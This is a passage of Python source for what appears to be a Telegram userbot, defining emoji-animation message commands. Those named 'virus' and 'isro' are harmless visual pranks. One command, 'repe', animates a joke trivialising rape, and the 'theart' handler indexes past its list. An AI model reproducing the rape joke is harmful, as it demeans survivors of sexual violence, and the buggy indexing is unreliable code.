"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛😊⬛⬛⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬛⬛⬜⬛⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n⬛⬜⬛⬛⬛⬜⬛\n⬛⬛⬛⬛⬛⬛⬛\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬜⬛😊⬛⬜⬛\n⬛⬛⬜⬜⬜⬛⬛\n⬛⬛⬛⬜⬛⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n⬛⬜⬛⬛⬛⬜⬛\n⬛⬛⬛⬛⬛⬛⬛\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛😊⬛⬛⬛\n⬛⬛⬜⬜⬜⬛⬛\n⬛⬜⬛⬜⬛⬜⬛\n⬛⬛⬜⬛⬜⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬜⬜⬜😊⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 16])
@borg.on(admin_cmd(pattern=f"mc$", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.3
animation_ttl = range(0, 28)
await event.edit("mc..")
animation_chars = [
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◻️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◻️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◻️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◻️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◻️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◻️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◻️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◻️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◻️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◻️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◻️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◻️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◻️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◻️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◻️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◻️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◻️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◻️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◻️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◻️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◻️◼️◻️◼️\n◼️◼️◼️◼️◼️\n◼️◻️◻️◻️◼️\n◼️◼️◼️◼️◼️"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 28])
@borg.on(admin_cmd(pattern="virus$"))
async def _(event):
if event.fwd_from:
return
animation_interval = 1
animation_ttl = range(0, 30)
await event.edit("Injecting virus....")
animation_chars = [
"🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️◼️◼️️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️◼️◼️◼️🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️◼️",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️◼️◼️",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️◼️\n◼️🔴🔵🌕♓♎⛎◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️🔴🔵🌕♓♎⛎◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️\n◼️◼️◼️◼️\n◼️◼️◼️◼️\n◼️◼️◼️◼️",
"◼️◼️◼️\n◼️◼️◼️\n◼️◼️◼️",
"◼️◼️\n◼️◼️",
"◼️"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 30])
@borg.on(admin_cmd(pattern=r"repe$", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.2
animation_ttl = range(0, 30)
await event.edit("repe")
animation_chars = [
"**r**",
"**ra**",
"**rap**",
"**rape**",
"**rape_**",
"**rape_t**",
"**rape_tr**",
"**rape_tra**",
"**rape_trai**",
"**rape_train**",
"**ape_train🚅**",
"**pe_train🚅🚃🚃**",
"**e_train🚅🚃🚃🚃**",
"**_train🚅🚃🚃🚃🚃**",
"**train🚅🚃🚃🚃🚃🚃**",
"**rain🚅🚃🚃🚃🚃🚃🚃**",
"**ain🚅🚃🚃🚃🚃🚃🚃🚃**",
"**in🚅🚃🚃🚃🚃🚃🚃🚃🚃**",
"**n🚅🚃🚃🚃🚃🚃🚃🚃🚃🚃**",
"🚅🚃🚃🚃🚃🚃🚃🚃🚃🚃",
"🚃🚃🚃🚃🚃🚃🚃🚃🚃",
"🚃🚃🚃🚃🚃🚃🚃🚃",
"🚃🚃🚃🚃🚃🚃🚃",
"🚃🚃🚃🚃🚃🚃",
"🚃🚃🚃🚃🚃",
"🚃🚃🚃🚃",
"🚃🚃🚃",
"🚃🚃",
"🚃",
"**rApEd**"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 30])
@borg.on(admin_cmd(pattern=r"theart$", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.1
animation_ttl = range(0, 117)
animation_chars = [
"❤️",
"🧡",
"💛",
"💚",
"💙",
"💜",
"🖤",
"💘",
"💝",
"❤️",
"🧡",
"💛",
"💚",
"💙",
"💜",
"🖤",
"💘",
"💝"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 100])
@borg.on(admin_cmd(pattern=f"isro$"))
async def _(event):
if event.fwd_from:
return
animation_interval = 1
animation_ttl = range(0, 24)
await event.edit("Connecting..")
animation_chars = [
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n🚀⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛🚀⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛🚀⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🚀⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛🚀⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛🚀\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"🛸⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n🛸⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛🛸⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛🛸⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛🛸⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🛸⬛⬛",
"⬛⬛⬛🛸⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🛸⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🛸⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🛸⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🛸⬛⬛\n⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🛸⬛🚶♂️\n⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🛸🚶♂️⬛\n⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n👽⬛⬛🛸🚶♂️⬛\n⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛👽⬛🛸🚶♂️⬛\n⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛👽🛸🚶♂️⬛\n⬜⬜⬜⬜⬜⬜",
"__Signal Lost....__"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 24])
@borg.on(admin_cmd(pattern=f"nakal$", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.5
animation_ttl = range(0, 6)
await event.edit("nakal")
animation_chars = [
"`⠀⠀⠀⣠⣶⡾⠏⠉⠙⠳⢦⡀⠀⠀⠀⢠⠞⠉⠙⠲⡀⠀\n ⠀⣴⠿⠏⠀⠀⠀⠀⠀ ⢳⡀⠀⡏⠀⠀⠀ ⠀⢷\n⢠⣟⣋⡀⢀⣀⣀⡀⠀⣀⡀⣧⠀⢸⠀⠀⠀ ⠀ ⡇\n⢸⣯⡭⠁⠸⣛⣟⠆⡴⣻⡲⣿ ⣸ Nikal ⡇\n ⣟⣿⡭⠀⠀⠀⠀⠀⢱⠀⠀ ⣿ ⢹⠀ ⡇\n ⠙⢿⣯⠄⠀⠀⠀__⠀⠀⡿ ⠀⡇⠀⠀⠀⠀ ⡼\n⠀⠀⠀⠹⣶⠆⠀⠀⠀⠀⠀⡴⠃⠀ ⠘⠤⣄⣠⠞⠀\n⠀⠀⠀⠀⢸⣷⡦⢤⡤⢤⣞⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⢀⣤⣴⣿⣏⠁⠀⠀⠸⣏⢯⣷⣖⣦⡀⠀⠀⠀⠀⠀⠀\n⢀⣾⣽⣿⣿⣿⣿⠛⢲⣶⣾⢉⡷⣿⣿⠵⣿⠀⠀⠀⠀⠀⠀\n⣼⣿⠍⠉⣿⡭⠉⠙⢺⣇⣼⡏⠀⠀ ⠀⣄⢸⠀⠀⠀⠀⠀⠀`",
